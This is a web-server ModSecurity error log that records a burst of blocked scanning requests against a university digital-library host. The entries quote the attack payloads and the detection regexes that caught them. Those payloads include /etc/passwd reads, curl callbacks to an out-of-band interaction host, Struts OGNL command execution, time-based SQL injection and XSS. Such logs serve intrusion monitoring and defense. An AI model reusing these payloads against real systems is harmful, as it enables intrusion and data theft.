[Tue Aug 29 11:33:35.334498 2023] [:error] [pid 905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/jexws4/jexws4.jsp"] [unique_id "ZO11H8Co-f0AAAOJKekAAAAE"]
[Tue Aug 29 11:33:35.389730 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO11H8Co-f0AAARQ3-YAAAAB"]
[Tue Aug 29 11:33:35.411459 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:old. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:old: test|cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/password_change.cgi"] [unique_id "ZO11H8Co-f0AAARo80cAAAAT"]
[Tue Aug 29 11:33:36.332905 2023] [:error] [pid 1153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/jexinv4/jexinv4.jsp"] [unique_id "ZO11IMCo-f0AAASBXQgAAAAM"]
[Tue Aug 29 11:33:36.377696 2023] [:error] [pid 1099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/cgi-bin/status"] [unique_id "ZO11IMCo-f0AAARLXzQAAAAQ"]
[Tue Aug 29 11:33:37.331687 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/jbossass/jbossass.jsp"] [unique_id "ZO11IcCo-f0AAARy-wAAAAAb"]
[Tue Aug 29 11:33:37.344759 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id: 1 AND (SELECT 1 FROM (SELECT(SLEEP(6)))A)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/chopslider/get_script/index.php"] [unique_id "ZO11IcCo-f0AAARv7TwAAAAY"]
[Tue Aug 29 11:33:37.349292 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/cgi-bin/stats"] [unique_id "ZO11IcCo-f0AAARQ3-sAAAAB"]
[Tue Aug 29 11:33:38.442418 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/cgi-bin/test"] [unique_id "ZO11IsCo-f0AAASAHbUAAAAH"]
[Tue Aug 29 11:33:39.336720 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/cgi-bin/status/status.cgi"] [unique_id "ZO11I8Co-f0AAARy-w8AAAAb"]
[Tue Aug 29 11:33:39.373884 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:USERDBDomains.Domainname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'MwLj'='MwLj found within ARGS:USERDBDomains.Domainname: geardomain' AND '5434'='5435' AND 'MwLj'='MwLj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/scgi-bin/platform.cgi"] [unique_id "ZO11I8Co-f0AAARt--4AAAAV"]
[Tue Aug 29 11:33:40.378924 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:id: YHLbGR%{128*128}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO11JMCo-f0AAARtAAQAAAAV"]
[Tue Aug 29 11:33:40.427212 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/test.cgi"] [unique_id "ZO11JMCo-f0AAAQKOnwAAAAs"]
[Tue Aug 29 11:33:40.478381 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:USERDBDomains.Domainname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '5434'='5434 found within ARGS:USERDBDomains.Domainname: geardomain' AND '5434'='5434' AND 'MwLj'='MwLj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/scgi-bin/platform.cgi"] [unique_id "ZO11JMCo-f0AAARv7U0AAAAY"]
[Tue Aug 29 11:33:41.304819 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %\\xe9\\x8c\\xa6'  found within ARGS:query: aa%\\xe9\\x8c\\xa6' union select 1,md5(999999999),3#'"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/plus/ajax_common.php"] [unique_id "ZO11JcCo-f0AAARQ4AsAAAAB"]
[Tue Aug 29 11:33:42.295867 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/debug.cgi"] [unique_id "ZO11JsCo-f0AAARy-yQAAAAb"]
[Tue Aug 29 11:33:43.388170 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/cgi-bin/test-cgi"] [unique_id "ZO11J8Co-f0AAARjjQQAAAAL"]
[Tue Aug 29 11:33:45.400409 2023] [:error] [pid 1157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:topicId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:topicId: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/widgets/knowledgebase"] [unique_id "ZO11KcCo-f0AAASFecwAAAAG"]
[Tue Aug 29 11:33:46.297054 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:calendarId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (5440=5440 found within ARGS:calendarId: 1) AND (SELECT 2065 FROM (SELECT(SLEEP(6)))jtGw) AND (5440=5440"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11KsCo-f0AAARy-zwAAAAb"]
[Tue Aug 29 11:33:47.388797 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ssid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ssid: \\x22'; curl http:/cjmn8l5jmimk2adbbnlg7c8q53oo1uwum.oast.site -H 'User-Agent: CRvF1U' #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO11K8Co-f0AAARo83UAAAAT"]
[Tue Aug 29 11:33:48.314938 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphon [hostname "digilibfh.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11LMCo-f0AAARy-0IAAAAb"]
[Tue Aug 29 11:33:48.364598 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ssid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ssid: \\x22'; curl http:/cjmn8l5jmimk2adbbnlgd3ierhbhsn8iu.oast.site -H 'User-Agent: CRvF1U'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO11LMCo-f0AAASAHdgAAAAH"]
[Tue Aug 29 11:33:49.311941 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:uid: 10; curl http:/cjmn8l5jmimk2adbbnlg53jwsjwnwzk6d.oast.site -H 'User-Agent: jT3jXs'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/system/sharedir.php"] [unique_id "ZO11LcCo-f0AAARtABsAAAAV"]
[Tue Aug 29 11:33:49.384595 2023] [:error] [pid 1157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphon [hostname "digilibfh.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11LcCo-f0AAASFedsAAAAG"]
[Tue Aug 29 11:33:50.320172 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:task_number. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:task_number: 1;curl http:/cjmn8l5jmimk2adbbnlgjqwwhy94ts9xb.oast.site -H 'User-Agent: jT3jXs'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/en/php/usb_sync.php"] [unique_id "ZO11LsCo-f0AAAQKOpkAAAAs"]
[Tue Aug 29 11:33:50.400332 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev 